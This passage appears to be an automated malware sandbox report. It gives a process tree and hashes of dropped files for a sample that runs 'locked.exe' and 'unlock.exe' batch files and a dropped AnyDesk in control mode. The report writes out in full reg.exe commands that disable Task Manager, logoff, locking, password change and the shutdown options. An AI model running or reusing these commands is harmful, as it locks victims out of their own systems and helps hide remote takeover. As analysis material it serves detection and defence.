                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
                                            4⤵
                                              PID:5988
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                              4⤵
                                                PID:5996
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
                                                4⤵
                                                  PID:4820
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
                                                  4⤵
                                                    PID:4760
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
                                                    4⤵
                                                      PID:7072
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
                                                      4⤵
                                                        PID:7080
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6776 /prefetch:8
                                                        4⤵
                                                          PID:7088
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
                                                          4⤵
                                                            PID:6184
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                                                            4⤵
                                                              PID:5628
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6856 /prefetch:2
                                                              4⤵
                                                                PID:5424
                                                            • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                              "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
                                                              3⤵
                                                              • Suspicious behavior: AddClipboardFormatListener
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5216
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
                                                              3⤵
                                                                PID:5708
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffaaa2346f8,0x7ffaaa234708,0x7ffaaa234718
                                                                  4⤵
                                                                    PID:2796
                                                                • C:\Users\Admin\AppData\Roaming\locked.exe
                                                                  "C:\Users\Admin\AppData\Roaming\locked.exe"
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  PID:6112
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D3F9.tmp\D3FA.tmp\D3FB.bat C:\Users\Admin\AppData\Roaming\locked.exe"
                                                                    4⤵
                                                                      PID:3920
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        5⤵
                                                                          PID:1664
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:6272
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:6324
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:6468
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:6708
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:6892
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                            PID:6956
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
                                                                            5⤵
                                                                              PID:7008
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
                                                                              5⤵
                                                                                PID:7024
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
                                                                                5⤵
                                                                                  PID:6448
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
                                                                                  5⤵
                                                                                    PID:6584
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
                                                                                    5⤵
                                                                                      PID:6784
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
                                                                                      5⤵
                                                                                        PID:6836
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
                                                                                        5⤵
                                                                                          PID:6868
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
                                                                                          5⤵
                                                                                            PID:216
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                            5⤵
                                                                                              PID:996
                                                                                            • C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
                                                                                              C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:3796
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 5 /nobreak
                                                                                              5⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:5488
                                                                                            • C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
                                                                                              C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4392
                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                          "C:\Windows\System32\taskkill.exe" /im autohotkeyu64.exe
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5572
                                                                                        • C:\Users\Admin\AppData\Roaming\unlock.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\unlock.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          PID:7060
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C60D.tmp\C60E.tmp\C60F.bat C:\Users\Admin\AppData\Roaming\unlock.exe"
                                                                                            4⤵
                                                                                              PID:2656
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 10 /nobreak
                                                                                                5⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5840
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                • Modifies registry key
                                                                                                PID:6132
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                • Modifies registry key
                                                                                                PID:944
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                • Modifies registry key
                                                                                                PID:3244
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                • Modifies registry key
                                                                                                PID:3452
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                • Modifies registry key
                                                                                                PID:4564
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 0 /f
                                                                                                5⤵
                                                                                                  PID:3276
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 0 /f
                                                                                                  5⤵
                                                                                                    PID:5664
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 0 /f
                                                                                                    5⤵
                                                                                                      PID:4668
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 0 /f
                                                                                                      5⤵
                                                                                                        PID:2072
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 0 /f
                                                                                                        5⤵
                                                                                                          PID:912
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 0 /f
                                                                                                          5⤵
                                                                                                            PID:5564
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 0 /f
                                                                                                            5⤵
                                                                                                              PID:7068
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 0 /f
                                                                                                              5⤵
                                                                                                                PID:4664
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 0 /f
                                                                                                                5⤵
                                                                                                                  PID:2980
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 0 /f
                                                                                                                  5⤵
                                                                                                                    PID:3908
                                                                                                          • C:\ProgramData\AnyDesk.exe
                                                                                                            "C:\ProgramData\AnyDesk.exe" --service
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1372
                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:2036
                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:752
                                                                                                              • C:\ProgramData\AnyDesk.exe
                                                                                                                "C:\ProgramData\AnyDesk.exe" --control
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:1400
                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x2fc 0x31c
                                                                                                                1⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5168
                                                                                                              • C:\ProgramData\Anydesk.exe
                                                                                                                C:\ProgramData/Anydesk.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Checks processor information in registry
                                                                                                                PID:6908
                                                                                                                • C:\ProgramData\Anydesk.exe
                                                                                                                  "C:\ProgramData\Anydesk.exe" --control
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:5488

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\ProgramData\AnyDesk\service.conf
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                98c3183e2832c60bec5b82950321e3de

                                                                                                                SHA1

                                                                                                                67c9d4ff1785e668368366e4dae02562492d8837

                                                                                                                SHA256

                                                                                                                115e77410688eaf198e49f5928cf3fff3a495dcb3d677717bd187f87ef344d19

                                                                                                                SHA512

                                                                                                                e173f422a9d48a8a2ef8354bd6792aef95c93d5d52af59522aceae05988ccf0a8b1c02c4c66eb95dc0ecee77200b01ef72ac95d6fb44e7e311a03b1807551e10

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\service.conf
                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                d9a38f065fda0ef80f621741642f5c82

                                                                                                                SHA1

                                                                                                                a4c1a27572aa07f2401503a352c9578562082e73

                                                                                                                SHA256

                                                                                                                2dd05a41dca5d316c237ddb54c3c053be855962dc17302323099997126436e2c

                                                                                                                SHA512

                                                                                                                689173082f045c077c57a2fa4d047adc4add1bf432cbda7a1167e47b2e62e6acaf1ddc39dcf72ac049bac6bcf91125123b3d311c68da38016700074132891e0d

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\system.conf
                                                                                                                Filesize

                                                                                                                370B

                                                                                                                MD5

                                                                                                                afdc4f69f4720b8c4153f6186f49a2b6

                                                                                                                SHA1

                                                                                                                329c27ea36d7913809b0c239bb58e91d2ee468ac

                                                                                                                SHA256

                                                                                                                9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

                                                                                                                SHA512

                                                                                                                3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\system.conf
                                                                                                                Filesize

                                                                                                                482B

                                                                                                                MD5

                                                                                                                80ad3e1e7491dfd6bd1f37b3821b1564

                                                                                                                SHA1

                                                                                                                70af87aa1a166c31b6adef38c3c95714d5ffc156

                                                                                                                SHA256

                                                                                                                cf670312980d175f9936d8247949e1fc347b6c259ef962dfb9e73078449e4c66

                                                                                                                SHA512

                                                                                                                7b97d0bc676285350a2c5bb51e4f805388879f5562a2a280298bda90541627dbbcead0aa6f801d9a44070a77c11faea7729fe7fd805a92879ff32dd3af73b2b6

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\system.conf
                                                                                                                Filesize

                                                                                                                690B

                                                                                                                MD5

                                                                                                                ab19e94571fc96292fb31c9332b7903b

                                                                                                                SHA1

                                                                                                                ad88cbf68d7b4db2dda29bf1965b8d041cebe5d6

                                                                                                                SHA256

                                                                                                                ea18880cbd754d1f983edb7e99aaf8b72eee4a8dca4685755c17f96c1342d289

                                                                                                                SHA512

                                                                                                                0897963cb81a0e130893e4dbc6082a34cc74e7a2d2c0b955333e2be99a616b198ba4d327b178d9dabe251e164bb402f09f25befe5df3bfd99f67232b0702887f

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\system.conf
                                                                                                                Filesize

                                                                                                                747B

                                                                                                                MD5

                                                                                                                4bf1ab4e1cfef63987035b9040425a7f

                                                                                                                SHA1

                                                                                                                4e372c51fd88458deadcc991037060f6e23bf393

                                                                                                                SHA256

                                                                                                                397b42fe9ef6912462512e1c2633b973fda367f1973f9e3f2836bfb7a85e2998

                                                                                                                SHA512

                                                                                                                b7136fd0aa23f552de060f1165fbc96b4b7b32e04954b34d4d63c173ebd7905f6e8499906a89fb9b685a59acdddea56d959fafd77d59835d5d575abf9e8c1f9d

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\AnyDesk\system.conf
                                                                                                                Filesize

                                                                                                                956B

                                                                                                                MD5

                                                                                                                7ae53620cb275fd85a82a2c417e4f365

                                                                                                                SHA1

                                                                                                                000cca0d3f2f35891a2fd002bbf046d56e73696f

                                                                                                                SHA256

                                                                                                                1185015ec98ff081249d55b7e1894a7e2db4f170194f8a47e78237062c1573db

                                                                                                                SHA512

                                                                                                                ca21ed5834dedb1dfce3a993d13b8062d1f04eb115ba2b7e131a171fb6e52df366de9a24e2ef4a4932ccc9571db3caaf1efbddd8a5423d8c5f39795c76a1e24d

                                                                                                                Download Submit

                                                                                                              • C:\ProgramData\gcapi.dll
                                                                                                                Filesize

                                                                                                                385KB

                                                                                                                MD5

                                                                                                                1ce7d5a1566c8c449d0f6772a8c27900

                                                                                                                SHA1

                                                                                                                60854185f6338e1bfc7497fd41aa44c5c00d8f85

                                                                                                                SHA256

                                                                                                                73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf

                                                                                                                SHA512

                                                                                                                7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                6cf293cb4d80be23433eecf74ddb5503

                                                                                                                SHA1

                                                                                                                24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                SHA256

                                                                                                                b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                SHA512

                                                                                                                0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                b28ef7d9f6d74f055cc49876767c886c

                                                                                                                SHA1

                                                                                                                d6b3267f36c340979f8fc3e012fdd02c468740bf

                                                                                                                SHA256

                                                                                                                fa6804456884789f4bdf9c3f5a4a8f29e0ededde149c4384072f3d8cc85bcc37

                                                                                                                SHA512

                                                                                                                491f893c8f765e5d629bce8dd5067cef4e2ebc558d43bfb05e358bca43e1a66ee1285519bc266fd0ff5b5e09769a56077b62ac55fa8797c1edf6205843356e75

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                584971c8ba88c824fd51a05dddb45a98

                                                                                                                SHA1

                                                                                                                b7c9489b4427652a9cdd754d1c1b6ac4034be421

                                                                                                                SHA256

                                                                                                                e2d8de6c2323bbb3863ec50843d9b58a22e911fd626d31430658b9ea942cd307

                                                                                                                SHA512

                                                                                                                5dbf1a4631a04d1149d8fab2b8e0e43ccd97b7212de43b961b9128a8bf03329164fdeb480154a8ffea5835f28417a7d2b115b8bf8d578d00b13c3682aa5ca726

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                c9a44d3f1068115750b88b13fed105a8

                                                                                                                SHA1

                                                                                                                c0b8181018905bbff7189f3ca462d7403dfade0a

                                                                                                                SHA256

                                                                                                                7ef70b3ab470d3b6f9965496cbbbd5c2060e6a7b1aef8d7ef0575561ea94c030

                                                                                                                SHA512

                                                                                                                2debdf3af28b3b52fbd017c213deeab3fe22bc761f06c00e9fa7c670f7d98842748f4ed206a6e52a8a13cbc9bdcb291803bfcee8bca9da8277fd7a0f84e28859

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT
                                                                                                                Filesize

                                                                                                                16B

                                                                                                                MD5

                                                                                                                46295cac801e5d4857d09837238a6394

                                                                                                                SHA1

                                                                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                SHA256

                                                                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                SHA512

                                                                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                b4ea0fa7c3302fee134b207c498fa572

                                                                                                                SHA1

                                                                                                                b298e1cd60c8ffe197a68989637f1b2342e46ddf

                                                                                                                SHA256

                                                                                                                2945b7c556addb1182bddf66142825d103b664f776c6f0e78157676873a93dbb

                                                                                                                SHA512

                                                                                                                fde7628254710e00b35350ae470940bbbfe3ff89e5076d3c03e556d6d284558dd7361c54f97640ee6e12f79bdd59574affca43e527a2586da1166c827799706e

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                160d1ed23d3da105df60771613eff76e

                                                                                                                SHA1

                                                                                                                7985c37fbb60a96447f71cbfbe67f598113fd60f

                                                                                                                SHA256

                                                                                                                6f8d7fd754a0eb729b2302bf82f43a5ea3517fc924ad6446c0011cc1a9d889c2

                                                                                                                SHA512

                                                                                                                ace5527352fb2b112e42242b91309a7472e5f70347f6c0f53513df879940e95ba56fce18fc926a9e67558cc32a563bbac140f1e8d8fe3f86f986cf9afac4084a

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                6c2f86e026f694b6d61f310955c27214

                                                                                                                SHA1

                                                                                                                3cd15458f78fee0d39b2f3694c60d376032e2b7b

                                                                                                                SHA256

                                                                                                                9d4d2abab73526f43aec3da335ef38e9ab9a5f8b12696ea4fae306b69f29a5d6

                                                                                                                SHA512

                                                                                                                f07ba8a0ed5e6c6b53eee3f132176b4bbeecd840b878564e0e0c5f4e78d841dec30c2d88e10729edccfbe37ec888ebef8bf4bf3fa6c77361fedb29c9ce2f3f2a

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

